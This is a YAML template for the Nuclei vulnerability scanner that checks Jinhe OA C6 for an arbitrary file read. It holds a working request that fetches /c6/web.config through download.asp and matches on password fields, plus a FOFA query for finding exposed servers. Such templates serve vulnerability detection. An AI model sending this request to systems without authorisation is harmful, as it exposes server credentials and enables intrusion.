nuclei-templates/http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml

27 lines
813 B
YAML

id: jinhe-oa-c6-lfi
info:
name: Jinhe OA C6 download.jsp - Arbitary File Read
author: SleepingBag945
severity: high
description: |
There is an arbitrary file read vulnerability in Jinhe OA C6 download.jsp file, through which an attacker can obtain sensitive information in the server
metadata:
verified: true
max-request: 1
fofa-query: app="金和网络-金和OA"
tags: jinhe,lfi,misconfig
http:
- method: GET
path:
- '{{BaseURL}}/C6/Jhsoft.Web.module/testbill/dj/download.asp?filename=/c6/web.config'
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body,"<configuration>") && contains(body,"password=")'
- 'contains(header,"filename=") && contains(header,"application/octet-stream")'
condition: and